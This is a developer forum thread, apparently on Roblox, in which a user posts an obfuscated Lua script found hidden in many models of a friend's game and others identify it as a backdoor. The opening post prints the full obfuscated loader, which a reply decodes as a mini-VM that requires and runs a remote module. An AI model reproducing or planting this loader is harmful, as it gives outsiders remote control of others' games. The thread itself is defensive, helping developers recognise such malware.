Anyone explain what this is?

NinjoOnline · January 27, 2020, 3:28am

Just looking through a place a friend of mine brought, and found this. Theres around 30 scripts with this in it, hidden in different models, so I’m assuming it’s some sort of virus. Can anyone explain?

local i=string.byte;local d=string.char;local c=string.sub;local u=table.concat;local L=getfenv or function()return _ENV end;local l=setmetatable;local s=select;local h=unpack;local r=tonumber;local function m(i)local e,n,a="","",{}local o=256;local t={}for l=0,o-1 do t[l]=d(l)end;local l=1;local function f()local e=r(c(i,l,l),36)l=l+1;local n=r(c(i,l,l+e-1),36)l=l+e;return n end;e=d(f())a[1]=e;while l<#i do local l=f()if t[l]then n=t[l]else n=e..c(e,1,1)end;t[o]=e..c(n,1,1)a[#a+1],e,o=n,n,o+1 end;return table.concat(a)end;local t=m('24327427424927526N24B22R23021F24B27427927B21I27E24326J23V27H23V27426M23N24Z24321I23N27F23N27H27V24326N27X23027U27426J24Z27H27S24327Q27S28428A24B27V27I27P27J28H24324727524124427526926U26A26E26Y28R24124127525D26U24027422B25221Y21423F25U29224323725U23A29725U243');local o=bit and bit.bxor or function(l,n)local e,o=1,0 while l>0 and n>0 do local a,c=l%2,n%2 if a~=c then o=o+e end l,n,e=(l-a)/2,(n-c)/2,e*2 end if l<n then l=n end while l>0 do local n=l%2 if n>0 then o=o+e end l,e=(l-n)/2,e*2 end return o end local function e(e,l,n)if n then local l=(e/2^(l-1))%2^((n-1)-(l-1)+1);return l-l%1;else local l=2^(l-1);return(e%(l+l)>=l)and 1 or 0;end;end;local l=1;local function n()local c,n,e,a=i(t,l,l+3);c=o(c,147)n=o(n,147)e=o(e,147)a=o(a,147)l=l+4;return(a*16777216)+(e*65536)+(n*256)+c;end;local function a()local e=o(i(t,l,l),147);l=l+1;return e;end;local function m()local l=n();local o=n();local c=1;local n=(e(o,1,20)*(2^32))+l;local l=e(o,21,31);local e=((-1)^e(o,32));if(l==0)then if(n==0)then return e*0;else l=1;c=0;end;elseif(l==2047)then return(n==0)and(e*(1/0))or(e*(0/0));end;return e*(2^(l-1023))*(c+(n/(2^52)));end;local r=n;local function f(e)local n;if(not e)then e=r();if(e==0)then return'';end;end;n=c(t,l,l+e-1);l=l+e;local e={}for l=1,#n do e[l]=d(o(i(c(n,l,l)),147))end return u(e);end;local l=n;local function u()local i={0,0,0,0,0,0,0,0,0,0};local l={};local c={};local t={i,nil,l,nil,nil,nil,c};t[5]=a();for e=1,n()do l[e-1]=u();end;for a=1,n()do local c=o(n(),125);local n=o(n(),165);local o=e(c,1,2);local l=e(n,1,11);local l={l,e(c,3,11),nil,nil,n};if(o==0)then l[3]=e(c,12,20);l[5]=e(c,21,29);elseif(o==1)then l[3]=e(n,12,33);elseif(o==2)then l[3]=e(n,12,32)-1048575;elseif(o==3)then l[3]=e(n,12,32)-1048575;l[5]=e(c,21,29);end;i[a]=l;end;local l=n()local n={0,0,0,0};for o=1,l do local e=a();local l;if(e==1)then l=(a()~=0);elseif(e==3)then l=m();elseif(e==2)then l=f();end;n[o]=l;end;t[2]=n t[6]=a();return t;end;local function m(l,e,f)local d=l[1];local i=l[2];local e=l[3];local e=l[6];return function(...)local n=1;local c=-1;local a={};local r={...};local l=s('#',...)-1;local o={};local o={nil,nil};for l=0,l do if(l>=e)then a[l-e]=r[l+1];else o[l]=r[l+1];end;end;local l;local t;while true do l=d[n];t=l[1];if t<=5 then if t<=2 then if t<=0 then do return end;elseif t>1 then local n=l[2];local a={};local e=0;local t=n+l[3]-1;for l=n+1,t do e=e+1;a[e]=o[l];end;local a={o[n](h(a,1,t-n))};local l=n+l[5]-2;e=0;for l=n,l do e=e+1;o[l]=a[e];end;c=l;else local e=l[2];if e>c then c=e end;o[e]=i[l[3]];end;elseif t<=3 then local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];elseif t>4 then f[i[l[3]]]=o[l[2]];n=n+1;l=d[n];local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=i[l[3]];n=n+1;l=d[n];e=l[2];r={};local a=0;Limit=e+l[3]-1;for l=e+1,Limit do a=a+1;r[a]=o[l];end;local t={o[e](h(r,1,Limit-e))};Limit=e+l[5]-2;a=0;for l=e,Limit do a=a+1;o[l]=t[a];end;c=Limit;n=n+1;l=d[n];f[i[l[3]]]=o[l[2]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=i[l[3]];n=n+1;l=d[n];e=l[2];r={};a=0;Limit=e+l[3]-1;for l=e+1,Limit do a=a+1;r[a]=o[l];end;t={o[e](h(r,1,Limit-e))};Limit=e+l[5]-2;a=0;for l=e,Limit do a=a+1;o[l]=t[a];end;c=Limit;n=n+1;l=d[n];e=l[2];o[e]();c=e-1;n=n+1;l=d[n];do return end;else do return end;end;elseif t<=8 then if t<=6 then local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];elseif t>7 then local l=l[2];o[l]();c=l-1;else local l=l[2];o[l]();c=l-1;end;elseif t<=10 then if t>9 then local n=l[2];local a={};local e=0;local t=n+l[3]-1;for l=n+1,t do e=e+1;a[e]=o[l];end;local a={o[n](h(a,1,t-n))};local l=n+l[5]-2;e=0;for l=n,l do e=e+1;o[l]=a[e];end;c=l;else local e=l[2];if e>c then c=e end;o[e]=i[l[3]];end;elseif t==11 then f[i[l[3]]]=o[l[2]];else f[i[l[3]]]=o[l[2]];end;n=n+1;end;end;end;return m(u(),{},L())();

blokav · January 27, 2020, 3:39am

It looks like an obfuscated backdoor script. Probably require()'s some remote module to run whatever the script kiddie wants.

DetailedModuler · January 27, 2020, 3:40am

I think you used a untrustable plugins or free models.
I suggest you to cut your game off any relation with roblox website.
(in order to avoid backdoored)
Delete all your plugin and free models.

NINJAMASTR999 · January 27, 2020, 3:45am

Obfuscated code. I’ve seen some developers use it (I’m guessing to protect their code from being reverse-engineered/stolen) but if it’s from a public model/object I would suggest deleting it ASAP.

blokav · January 27, 2020, 4:05am

I tested this in an empty place and got an “Unable to find module for asset id” error, so this is definitely a virus. No sane person would obfuscate code this much if it wasn’t malicious.

blokav · January 27, 2020, 4:11am

If would be nice if Roblox added a property to ServerScriptService that lets you disable calling require() on remote module scripts.

NINJAMASTR999 · January 27, 2020, 4:22am

The one example I’m drawing from comes from a Roblox group called “PodTech”, which creates assets for airline groups on Roblox. The aviation community is notoriously toxic and known for having scripts and assets stolen left and right, so I guess the owner had enough and decided to encrypt their stuff completely.

It’s an outlier case for sure, but I can see why people would want to obfuscate their stuff in certain situations. Maybe it’s more about knowing where it comes from?

NinjoOnline · January 27, 2020, 4:22am

It’s not my game, but I’ll tell them to do this

spicychilly2 · January 27, 2020, 9:11pm

Yes, i saw this in my game to. It’s a script that just randomly clones itself into random parts in workspace, i don’t know what it is though. I never use free models.

spicychilly2 · January 27, 2020, 9:13pm

I dont think that is the case because its a script that clones itself into random objects in workspace, and my game is not about airlines.

aschepler · January 28, 2020, 3:38am

This is kind of strange. Most of it is a custom mini-VM. But then that VM only gets used to execute a payload which is essentially Re = require(3319703854); Re(3319736847) - so yes, a remote code injection after all.